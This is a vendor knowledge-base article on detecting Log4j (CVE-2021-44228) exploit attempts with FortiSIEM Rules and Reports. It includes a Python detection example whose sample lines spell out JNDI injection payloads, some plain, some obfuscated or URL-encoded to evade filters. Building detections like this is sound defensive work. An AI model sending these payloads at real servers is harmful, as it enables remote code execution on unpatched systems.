Created on 12-14-2021 04:30 AM Edited on 12-20-2021 12:51 PM By Anonymous
Description
This article describes how to use custom Rules and Reports to help detect activity related to the log4j vulnerability CVE-2021-44228.
What is included in Fortinet_FortiSIEM-log4j-Detection-v2.zip?
1) FortiSIEM_log4j_Rules_v2.xml.
2) FortiSIEM_log4j_Reports_v2.1.xml.
These Reports can be run on a schedule or on demand. They help identify exploit attempts detected by FortiGate's IPS, as well as Events categorised as Permitted Traffic whose URI or HTTP content (see the Rules for the specific attributes) matches a particular regex pattern.
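As an added illustration (not code from this article and not Fortinet's rule pack), the Python snippet below shows the kind of regex check the Reports apply to URI or HTTP content, run over constructed sample request lines. The sample lines, the obfuscation handling and the list of JNDI URI schemes are assumptions made for this example; the regex actually used by the "Log4J Exploit Request Detected By Regex" Rule is the one in FortiSIEM_log4j_Rules_v2.xml.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not real captures). They stand in for the
# URI / HTTP-header content of events a SIEM would classify as Permitted Traffic.
# Indexes 1..4 carry a JNDI lookup in plain, nested-lookup and URL-encoded forms
# that defeat a naive "${jndi:" substring match; index 5 is a benign mention.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1 UA=Mozilla/5.0",
    "GET /login?user=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1",
    "GET / HTTP/1.1 X-Api-Version=${${lower:j}ndi:rmi://203.0.113.9/x}",
    "GET / HTTP/1.1 UA=${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/z}",
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fp%7D HTTP/1.1",
    "GET /search?q=jndi HTTP/1.1",
]

# Lookup tricks that resolve to a single literal, collapsed from the inside out:
# ${lower:j} / ${upper:J} -> j, and any ${...:-j} default value -> j.
OBFUSCATION = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}"
    r"|\$\{[^${}]*?:-([^${}]*)\}",
    re.IGNORECASE,
)

# A JNDI lookup followed by one of the URI schemes the resolver accepts.
# The scheme list is an assumption for this example, not the Fortinet Rule's.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def normalize(text: str) -> str:
    """URL-decode (at most twice, to cover double encoding) and collapse
    nested lookups until the string stops changing."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        collapsed = OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if collapsed == text:
            return text
        text = collapsed


def detect(line: str):
    """Return the lower-cased JNDI URI scheme found in the line, or None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = detect(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for i, scheme in scan(SAMPLE_REQUESTS):
        print(f"line {i}: jndi:{scheme} lookup -> {SAMPLE_REQUESTS[i]}")
```

The point of normalising before matching is that a pattern anchored on the literal text `${jndi:` misses the nested-lookup and URL-encoded variants above, while a pattern loose enough to catch them raw tends to fire on ordinary traffic; decoding first lets the final regex stay strict.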
For more information about this attack, see the following FortiGuard Outbreak Alert: FortiGuard Outbreak Alert - Log4j2 Vulnerability
Updated 2021-12-17 - revision 2: changes to the "Log4J Exploit Request Detected By Regex" Rule to increase its scope and reduce false positives.
Updated 2021-12-20 - no change in content; the Report file naming was revised to v2 in line with the Solution steps below. The report content remains the same.
Updated 2021-12-20 - Reports updated to version 2.1, which provides better support for import on some FortiSIEM versions.
Scope
The custom Rules and Reports provided can be used in FortiSIEM 6.x.
Solution
All screenshots provided below for illustration purposes are taken from FortiSIEM 6.3.2.
1) Download the Fortinet_FortiSIEM-log4j-Detection-v2.zip file (contains 2 files).
2) Unzip Fortinet_FortiSIEM-log4j-Detection-v2.zip.
3) Import the Reports using FortiSIEM_log4j_Reports_v2.1.xml.
4) Import the Rules using FortiSIEM_log4j_Rules_v2.xml.
Imported and enabled Rules
Imported Reports
Copyright 2025 Fortinet, Inc. All Rights Reserved.